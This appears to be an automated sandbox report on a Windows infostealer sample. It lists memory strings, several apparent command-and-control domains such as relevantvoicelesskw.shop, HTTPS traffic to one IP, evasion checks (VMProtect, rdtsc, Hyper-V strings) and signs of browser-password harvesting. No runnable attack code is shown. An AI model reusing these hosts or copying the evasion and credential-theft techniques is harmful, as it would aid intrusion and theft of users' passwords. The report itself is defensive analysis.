              Source: Ag3ijL3z1w.exe, 00000000.00000003.1764742560.000000000308C000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1765258902.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1764592696.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1765053909.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741282403.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1746883165.000000000308E000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1739179315.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741194692.000000000308D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop/api~
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1705274256.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop/b
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop/l
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1872803431.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1876372507.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop/s
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1876372507.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop/~
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1720366524.000000000308C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop:443/apiBE2NhtLOoTLNNgOkw
              Source: Ag3ijL3z1w.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712600543.00000000030CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713734255.00000000030A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsoft.
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712600543.00000000030CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712600543.00000000030CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1705221839.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712321938.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1705205037.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1705221839.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712321938.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1705205037.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49739 version: TLS 1.2

              System Summary

              barindex
              Source: Ag3ijL3z1w.exeStatic PE information: section name: .vmp$PH
              Source: Ag3ijL3z1w.exeStatic PE information: section name: .vmp$PH
              Source: Ag3ijL3z1w.exeStatic PE information: section name: .vmp$PH
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000820C1 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00074280 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000924B2 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000746B7 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000927AF NtOpenSection,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000967D0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000927F1 NtMapViewOfSection,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0009286A NtClose,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00092987 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00078E50 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00090F80 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007541A NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00095440 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00095640 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000756F7 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00095810 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007D860 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00095940 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00095BD0 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00095D40 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00096060 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00072277 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00096400 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00076492 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007C5F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00072700 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007C765 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007A762 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00076790 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007A880 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00092C52 NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00074D10 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007EDB2 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00080F04 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007CF46 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0008F1E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00091220 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00077305 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000914A0 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00091600 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007960A NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00091710 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00091840 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00091950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00095AB0 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00079C41 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00077C59 NtAllocateVirtualMemory,NtFreeVirtualMemory,
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00064640
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00083216
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000812E2
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007D860
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00096060
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00082382
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00096400
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000664F0
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0011A824
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000668B4
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00086D8E
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00062E70
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00080F04
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007CF46
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00072F77
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0008EF80
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007F3FD
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00065477
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0007960A
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00061700
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00065717
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00083216
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00073A27
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00065A3C
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00077A8C
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00067B20
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00079C41
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00063C6F
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_002DDCD6
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0006FDB0
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00065F30
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: String function: 00068560 appears 44 times
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: String function: 0006FF60 appears 154 times
              Source: Ag3ijL3z1w.exeStatic PE information: invalid certificate
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: winhttp.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: webio.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: mswsock.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: winnsi.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: schannel.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: gpapi.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: amsi.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: userenv.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: profapi.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSection loaded: ondemandconnroutehelper.dll
              Source: Ag3ijL3z1w.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@3/1
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.000000000307E000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712772527.00000000030A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile read: C:\Users\user\Desktop\Ag3ijL3z1w.exeJump to behavior
              Source: Ag3ijL3z1w.exeStatic file information: File size 2444904 > 1048576
              Source: Ag3ijL3z1w.exeStatic PE information: Raw size of .vmp$PH is bigger than: 0x100000 < 0x24ae00
              Source: Ag3ijL3z1w.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp$PH
              Source: Ag3ijL3z1w.exeStatic PE information: section name: .vmp$PH
              Source: Ag3ijL3z1w.exeStatic PE information: section name: .vmp$PH
              Source: Ag3ijL3z1w.exeStatic PE information: section name: .vmp$PH
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_3_00B29BB3 push ds; retf
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000A8597 pushfd ; ret
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_000A6A32 push cs; retf
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_003533E7 push esi; ret
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00105F3D push esp; ret
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeSystem information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0013E70F rdtsc
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe TID: 7280Thread sleep time: -210000s >= -30000s
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1705221839.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712321938.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1875704776.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1873169366.0000000000ADF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1705221839.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712321938.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1875704776.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1873169366.0000000000ADF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1875504180.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_0013E70F rdtsc

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: associationokeo.shop
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: turkeyunlikelyofw.shop
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: pooreveningfuseor.pw
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: edurestunningcrackyow.fun
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: detectordiscusser.shop
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: relevantvoicelesskw.shop
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: colorfulequalugliess.shop
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: wisemassiveharmonious.shop
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeQueries volume information: C:\ VolumeInformation
